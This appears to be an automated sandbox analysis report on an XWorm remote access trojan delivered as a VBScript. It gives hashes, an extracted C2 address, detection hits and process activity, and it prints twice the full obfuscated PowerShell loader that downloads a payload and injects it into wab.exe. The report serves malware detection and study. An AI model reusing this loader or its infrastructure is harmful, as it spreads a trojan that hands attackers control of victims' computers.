xworm | 9fde917e0e590e34264a37918d73be9645301cd68793cf28bbb8430dd1a6fed2

General

Target

file.vbs
Size

72KB
MD5

7c89c3540caaa52052018271109f6a9a
SHA1

78c973d9ab8326fbbacb11b7c5d8492030f8e3c4
SHA256

9fde917e0e590e34264a37918d73be9645301cd68793cf28bbb8430dd1a6fed2
SHA512

83750d0d142d8f3b7a6ce6edb304576561e2d5db69b0e6afd088f24af4a1b00abf49224a5227b1106b39734fef18ed1c87f45b210d1ac989d496d59c685e3bf1
SSDEEP

1536:+gcBy6Tr/S2UT3WnyhNZvaOh9jWoAYz1P74QhblEiAGTC:+qs7UTGncNZvX9K450Qx8GTC

Score

10^/10

xworm rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

xwormmom53.duckdns.org:8896

Mutex

EXwKoBFFWMorKcFJ

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1556-86-0x00000000004D0000-0x00000000004E0000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

3 3060 powershell.exe
5 3060 powershell.exe
7 3060 powershell.exe
9 3060 powershell.exe
11 3060 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

1556 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1536 powershell.exe
1556 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1536 set thread context of 1556 1536 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

3060 powershell.exe
1536 powershell.exe
1536 powershell.exe
1556 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1536 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 3060 powershell.exe
Token: SeDebugPrivilege 1536 powershell.exe
Token: SeDebugPrivilege 1556 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

1556 wab.exe

flow	pid	process
3	3060	powershell.exe
5	3060	powershell.exe
7	3060	powershell.exe
9	3060	powershell.exe
11	3060	powershell.exe

pid	process
1556	wab.exe

pid	process
1536	powershell.exe
1556	wab.exe

description	pid	process	target process
PID 1536 set thread context of 1556	1536	powershell.exe	wab.exe

pid	process
3060	powershell.exe
1536	powershell.exe
1536	powershell.exe
1556	wab.exe

pid	process
1536	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3060	powershell.exe
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	1556	wab.exe

pid	process
1556	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2008 wrote to memory of 3060	2008	WScript.exe	powershell.exe
PID 2008 wrote to memory of 3060	2008	WScript.exe	powershell.exe
PID 2008 wrote to memory of 3060	2008	WScript.exe	powershell.exe
PID 3060 wrote to memory of 2576	3060	powershell.exe	cmd.exe
PID 3060 wrote to memory of 2576	3060	powershell.exe	cmd.exe
PID 3060 wrote to memory of 2576	3060	powershell.exe	cmd.exe
PID 3060 wrote to memory of 1536	3060	powershell.exe	powershell.exe
PID 3060 wrote to memory of 1536	3060	powershell.exe	powershell.exe
PID 3060 wrote to memory of 1536	3060	powershell.exe	powershell.exe
PID 3060 wrote to memory of 1536	3060	powershell.exe	powershell.exe
PID 1536 wrote to memory of 2640	1536	powershell.exe	cmd.exe
PID 1536 wrote to memory of 2640	1536	powershell.exe	cmd.exe
PID 1536 wrote to memory of 2640	1536	powershell.exe	cmd.exe
PID 1536 wrote to memory of 2640	1536	powershell.exe	cmd.exe
PID 1536 wrote to memory of 1556	1536	powershell.exe	wab.exe
PID 1536 wrote to memory of 1556	1536	powershell.exe	wab.exe
PID 1536 wrote to memory of 1556	1536	powershell.exe	wab.exe
PID 1536 wrote to memory of 1556	1536	powershell.exe	wab.exe
PID 1536 wrote to memory of 1556	1536	powershell.exe	wab.exe
PID 1536 wrote to memory of 1556	1536	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsoSad.eg,nexhrDi.soaSyntamLandbm Flori .ovenQ.estgUnder)Massa ');$Chalybean=$Maalerudstyr[0];Nassedes (Jammerklagen 'Afgrn$MaartgWeen.lM,ddeo Unhib F,ldaAntipl Komb:AtomiTM erer H,ckaperp n,mnumsP,shrc InseePapirn typid depoeAn corSlaveeSynchdPleace ReklsWalky= vacuNPerc,eSkarpw Omsk-S.attOspyd,bFalskjunifoeSw.rmcKo,ultPrsid Arg,mSDecliyLavatsobligtPsecneAfvejmRed.o.Na.huNIntroeMargetLiged.DasypWk.ekie .lamb njuCsubcrlBailoiYlvabeOsc en,rogetYappi ');Nassedes (Jammerklagen 'Uniso$GuardT WindrSphy aExotrnPleths yddcCiliceUdskrnArkivdShakseMewlsrHftigeTek.tdNon,peTh.las,hodo. orayHAndreeAteetaFgtekdSpendeUnexprGeners peda[Holdu$RandpHVesteyJelabdGarvnrFu ktoKrongsGastia Re tlTillgtBi.ho2Bowli2 Ge e3Kryb ]Advok= dame$Hill KKontoi owncrBaronkTydnieDa iegKnackaSkrifnMer eg ExogeSidst ');$Toksikologerne=Jammerklagen 'ex.crTSchizrCentra ,ragnBush,sRe.arcJgerseTilsvnMiratd Ok ueFertirPaeaneSkra,dFaitheUd iks W,re. hemaD.raktoJaz.bwReskonZorrol GospoPas.aaAu.cadVarmeF Sem,i.noffl.inceeVil a(Canno$UnchaC SammhFarvaaUntatlAspa.y AntibBiv,aeReobla riftnSingi,organ$Doge,MMeds.eSrge,t.erruaK.bellHoldnt ChidrGym,oaKra,va Gn wdOmfly)Aa en ';$Toksikologerne=$Lordswike[1]+$Toksikologerne;$Metaltraad=$Lordswike[0];Nassedes (Jammerklagen 'Suc e$GlairgBetjelIntrao .ilib Hyrea Un.rlAlm c:PartiJMinoreKnsf,naleneh Svi.aTurneaHeartrGe,neePathonForageKranssTugt,=S,rub( ynocTSyba eHenresIndhotXipho- espiPMu,icaSndertMeta h,ucle trigo$BrevbM Blg eRelant RimeaWarfalmajust hmerInsenaScylla,pistdster.)Amora ');while (!$Jenhaarenes) {Nassedes (Jammerklagen 'Op,ld$T,nglgSyndelStelloJemadbDisseaSkoldl Afhu: PapiL nderaIndd n Flo dDefl.mWavenaHeternm.xitdComdasjan.tbsammeaTerpenAdjunkTootheTropsnMan.as Udma= Stt,$It,tatC.nterRe,seuSpewie Sprj ') ;Nassedes $Toksikologerne;Nassedes (Jammerklagen 'IrakeSSammetMelanaStatsrt.iblt,emil- SvedS Betrlforsre CucueDommepAnska M,se4 Syda ');Nassedes (Jammerklagen 'Volit$Ha,rbgNissil PlasoBond bImpanaCondilHobby: CompJBeguneLocianToetah Sanda C.llaBrn,erdatabep ramnRealie i,cisXalos=Forla(EphesTDebutemiscosaffjet Resp-Mor.aPL guna SingtA,rinh Prog Inval$VognmMUnp.oePolygt ContaUd,rnlSkil tFor,rrUncora Netva St,idEmbla)Amphi ') ;Nassedes (Jammerklagen ' .ent$FertigEnchalGteh,oSvartb,etalaSexollE.est:br.byH Afseam.harmVindem,ynneo.nbric.risikUkvall ndeniCochakBossieUncou=Mampu$ T.psgPrer,lwill oTautibSulf.aUpb nlLiber:H.nneClegeghAdnera,btusyOffenrTuriso Ag eoPoisot Indu+Skrt,+Stand%Drn e$ AltsM Uafha op.raNydenlFeltseFo.mirLymp,ustramdMargasVens,t IndryRollerFum r.Mar.ic onodoDruekuP.mprnSkrddtBourb ') ;$Chalybean=$Maalerudstyr[$Hammocklike];}$socialdemokratierne=340816;$glossina=29883;Nassedes (Jammerklagen 'Rumin$ draag,arzalnordyoVe.etbForhjaDecimlDgnbe:Au.piA RevlnPaknitc,nsuiSatircMvre.iUd ispRhap.aS,gehnMisbrt.kseh Stil= Refl bundGEylhoeFe.ietMaane-FrimeCFad,roYamamn totttPar,ie PerlnSubpattraci C,rer$FosteMAteete InextAltinaDuplilEngrotOmeg rNeomiaSkelsaKo,ladUnder ');Nassedes (Jammerklagen 'Prisk$BizengAnkyllCo,tooN tiobSaccha ,thylLacci:RecurBO,iemaRhapsnEryngk atrokIntera AphrssyndesBostte Sik r W,theKvadrr Sh.m Meta= Micr Bewil[SjussS Pally S lvsHemiltStatuest.ipm Stni.Qu veCSuperoRarebn BlvevCyngheAlarmrEnsmathvidv]Boble: Ko,r:ManuaFFulmirBes ioDe.olmNeelaBUnd,ra OmphsinosieSpnd,6Docum4SerabSMrnent IntrrPsykoifo.ernFaldbgStr e(F.sil$dobb,AAr.henAstiatVerd,iKl.vecGalaci santpTransaStrubnVensktOmstn)Tandk ');Nassedes (Jammerklagen 'Grund$ AnabgKrt gl Gla.o BirtbMorala H ndlBrahm:Morg,RBrahmeIn.erg HulliJdisktNonoizPourpe Udsksel es blksp=Nonvo Bilia[ ParmS Le.tyKernes SelvtSneryeFer,umraasa. Op aT Dugfe Hue,xPhytitNdven.,idacEPotionFlambc AdiaoCalildCentri Titen Silkg.ntro]Skol : ragi:HalvaASloveS dsprCDrejeIVifteI Ideo.p nerGReconeTrinitRdnbbSEr,nttIntelr F rkiD stenEugeng M,ll(Keram$ Ce,tBFrasaa Kon nK,avikCirc,k Her aCan,sseftersProtoeLatisrOrangeSpe.crTromb)Hand. ');Nassedes (Jammerklagen 'Intro$SelvbgVirallVildnoOmskrb,hampa LilllF,ake:basisfMyoelykroker ConfeMon ctLong sTrykl=depre$BlindRFlareeIronfgSuperiScelot Radiz Kreaescolds kyde. StotsNicaru arkvbE ders Udf tNitterRovetiApplenPhrasgKonce(textu$SkeptsOmsa,oPlutec SceniOutmaa ottel.ndkbdSaloneAmphimMea.ioO.holkForrerGoos.a spertFremmiIronie SagtrPh.lanAnkereM rcu,Appli$ PropgStartlBy ano AflysRud.isPoleriUtaknnOvergaLig.t)Org a ');Nassedes $fyrets;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3060

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"
3⤵
PID:2576

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsoSad.eg,nexhrDi.soaSyntamLandbm Flori .ovenQ.estgUnder)Massa ');$Chalybean=$Maalerudstyr[0];Nassedes (Jammerklagen 'Afgrn$MaartgWeen.lM,ddeo Unhib F,ldaAntipl Komb:AtomiTM erer H,ckaperp n,mnumsP,shrc InseePapirn typid depoeAn corSlaveeSynchdPleace ReklsWalky= vacuNPerc,eSkarpw Omsk-S.attOspyd,bFalskjunifoeSw.rmcKo,ultPrsid Arg,mSDecliyLavatsobligtPsecneAfvejmRed.o.Na.huNIntroeMargetLiged.DasypWk.ekie .lamb njuCsubcrlBailoiYlvabeOsc en,rogetYappi ');Nassedes (Jammerklagen 'Uniso$GuardT WindrSphy aExotrnPleths yddcCiliceUdskrnArkivdShakseMewlsrHftigeTek.tdNon,peTh.las,hodo. orayHAndreeAteetaFgtekdSpendeUnexprGeners peda[Holdu$RandpHVesteyJelabdGarvnrFu ktoKrongsGastia Re tlTillgtBi.ho2Bowli2 Ge e3Kryb ]Advok= dame$Hill KKontoi owncrBaronkTydnieDa iegKnackaSkrifnMer eg ExogeSidst ');$Toksikologerne=Jammerklagen 'ex.crTSchizrCentra ,ragnBush,sRe.arcJgerseTilsvnMiratd Ok ueFertirPaeaneSkra,dFaitheUd iks W,re. hemaD.raktoJaz.bwReskonZorrol GospoPas.aaAu.cadVarmeF Sem,i.noffl.inceeVil a(Canno$UnchaC SammhFarvaaUntatlAspa.y AntibBiv,aeReobla riftnSingi,organ$Doge,MMeds.eSrge,t.erruaK.bellHoldnt ChidrGym,oaKra,va Gn wdOmfly)Aa en ';$Toksikologerne=$Lordswike[1]+$Toksikologerne;$Metaltraad=$Lordswike[0];Nassedes (Jammerklagen 'Suc e$GlairgBetjelIntrao .ilib Hyrea Un.rlAlm c:PartiJMinoreKnsf,naleneh Svi.aTurneaHeartrGe,neePathonForageKranssTugt,=S,rub( ynocTSyba eHenresIndhotXipho- espiPMu,icaSndertMeta h,ucle trigo$BrevbM Blg eRelant RimeaWarfalmajust hmerInsenaScylla,pistdster.)Amora ');while (!$Jenhaarenes) {Nassedes (Jammerklagen 'Op,ld$T,nglgSyndelStelloJemadbDisseaSkoldl Afhu: PapiL nderaIndd n Flo dDefl.mWavenaHeternm.xitdComdasjan.tbsammeaTerpenAdjunkTootheTropsnMan.as Udma= Stt,$It,tatC.nterRe,seuSpewie Sprj ') ;Nassedes $Toksikologerne;Nassedes (Jammerklagen 'IrakeSSammetMelanaStatsrt.iblt,emil- SvedS Betrlforsre CucueDommepAnska M,se4 Syda ');Nassedes (Jammerklagen 'Volit$Ha,rbgNissil PlasoBond bImpanaCondilHobby: CompJBeguneLocianToetah Sanda C.llaBrn,erdatabep ramnRealie i,cisXalos=Forla(EphesTDebutemiscosaffjet Resp-Mor.aPL guna SingtA,rinh Prog Inval$VognmMUnp.oePolygt ContaUd,rnlSkil tFor,rrUncora Netva St,idEmbla)Amphi ') ;Nassedes (Jammerklagen ' .ent$FertigEnchalGteh,oSvartb,etalaSexollE.est:br.byH Afseam.harmVindem,ynneo.nbric.risikUkvall ndeniCochakBossieUncou=Mampu$ T.psgPrer,lwill oTautibSulf.aUpb nlLiber:H.nneClegeghAdnera,btusyOffenrTuriso Ag eoPoisot Indu+Skrt,+Stand%Drn e$ AltsM Uafha op.raNydenlFeltseFo.mirLymp,ustramdMargasVens,t IndryRollerFum r.Mar.ic onodoDruekuP.mprnSkrddtBourb ') ;$Chalybean=$Maalerudstyr[$Hammocklike];}$socialdemokratierne=340816;$glossina=29883;Nassedes (Jammerklagen 'Rumin$ draag,arzalnordyoVe.etbForhjaDecimlDgnbe:Au.piA RevlnPaknitc,nsuiSatircMvre.iUd ispRhap.aS,gehnMisbrt.kseh Stil= Refl bundGEylhoeFe.ietMaane-FrimeCFad,roYamamn totttPar,ie PerlnSubpattraci C,rer$FosteMAteete InextAltinaDuplilEngrotOmeg rNeomiaSkelsaKo,ladUnder ');Nassedes (Jammerklagen 'Prisk$BizengAnkyllCo,tooN tiobSaccha ,thylLacci:RecurBO,iemaRhapsnEryngk atrokIntera AphrssyndesBostte Sik r W,theKvadrr Sh.m Meta= Micr Bewil[SjussS Pally S lvsHemiltStatuest.ipm Stni.Qu veCSuperoRarebn BlvevCyngheAlarmrEnsmathvidv]Boble: Ko,r:ManuaFFulmirBes ioDe.olmNeelaBUnd,ra OmphsinosieSpnd,6Docum4SerabSMrnent IntrrPsykoifo.ernFaldbgStr e(F.sil$dobb,AAr.henAstiatVerd,iKl.vecGalaci santpTransaStrubnVensktOmstn)Tandk ');Nassedes (Jammerklagen 'Grund$ AnabgKrt gl Gla.o BirtbMorala H ndlBrahm:Morg,RBrahmeIn.erg HulliJdisktNonoizPourpe Udsksel es blksp=Nonvo Bilia[ ParmS Le.tyKernes SelvtSneryeFer,umraasa. Op aT Dugfe Hue,xPhytitNdven.,idacEPotionFlambc AdiaoCalildCentri Titen Silkg.ntro]Skol : ragi:HalvaASloveS dsprCDrejeIVifteI Ideo.p nerGReconeTrinitRdnbbSEr,nttIntelr F rkiD stenEugeng M,ll(Keram$ Ce,tBFrasaa Kon nK,avikCirc,k Her aCan,sseftersProtoeLatisrOrangeSpe.crTromb)Hand. ');Nassedes (Jammerklagen 'Intro$SelvbgVirallVildnoOmskrb,hampa LilllF,ake:basisfMyoelykroker ConfeMon ctLong sTrykl=depre$BlindRFlareeIronfgSuperiScelot Radiz Kreaescolds kyde. StotsNicaru arkvbE ders Udf tNitterRovetiApplenPhrasgKonce(textu$SkeptsOmsa,oPlutec SceniOutmaa ottel.ndkbdSaloneAmphimMea.ioO.holkForrerGoos.a spertFremmiIronie SagtrPh.lanAnkereM rcu,Appli$ PropgStartlBy ano AflysRud.isPoleriUtaknnOvergaLig.t)Org a ');Nassedes $fyrets;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"
4⤵
PID:2640

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1556

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
0299c0106f14826a17cad78a1a53d6c0

SHA1
eb585f732b67b04c09f4b7e98d5747fa183ff1fc

SHA256
2867d14077e920508e4f7a5c0b1104e9b396fdd861479098d843a3fe8af11387

SHA512
a0a0254f1ed8c49ad11a995c025921efa5bd88f1b3d301ba3959b773fec927ca0b6e71f6491304abaf99b5b5255d9d4ee5e4a5ea38b4b89b5b1059701900232d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2FF8.tmp
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar301A.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Blanko.Pro
Filesize
482KB

MD5
5a1b718a30938cc57569037887c3c7a4

SHA1
186aaed9bf3ba2d64a0d532cd605648e5edff6b7

SHA256
d0790d9c9a95cdbe48f8a3947d351ead3d816d646213d023e35cca22995f51e1

SHA512
d54fd64d63fe799e7799fccf39082f1166d1e707a02a2ecec53da2a9f446deab1d4dda5e7b3e27f247521c6edfd54330f1c39016b46d1689a34f345fe7d14c42

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5O01S95AJ4TQDRMCRZ0Z.temp
Filesize
7KB

MD5
f3fa81ca8230cb90402264fb3cf23f36

SHA1
762f6feab7efaf5bfcb5322615a4c0cda75b2e35

SHA256
97bcd4d4074f07d269633f4e655005acd88636a431613550fc6fb6ccc3176545

SHA512
95a092b12ff4caec0eabfd6900bbc837cacc01cf2359c51a9029a39ade279c8c94d0f23bd9f0226dac59577a2dddda2be90481df84b93072f8a8f6c44a4ed5b8

Download Submit
memory/1536-55-0x00000000064E0000-0x0000000008EC5000-memory.dmp

Filesize
41.9MB

Download
memory/1556-84-0x00000000004D0000-0x0000000001532000-memory.dmp

Filesize
16.4MB

Download
memory/1556-86-0x00000000004D0000-0x00000000004E0000-memory.dmp

Filesize
64KB

Download
memory/3060-4-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp

Filesize
4KB

Download
memory/3060-8-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/3060-7-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/3060-6-0x0000000001E90000-0x0000000001E98000-memory.dmp

Filesize
32KB

Download
memory/3060-10-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/3060-56-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/3060-57-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp

Filesize
4KB

Download
memory/3060-5-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/3060-9-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/3060-85-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download
memory/3060-11-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing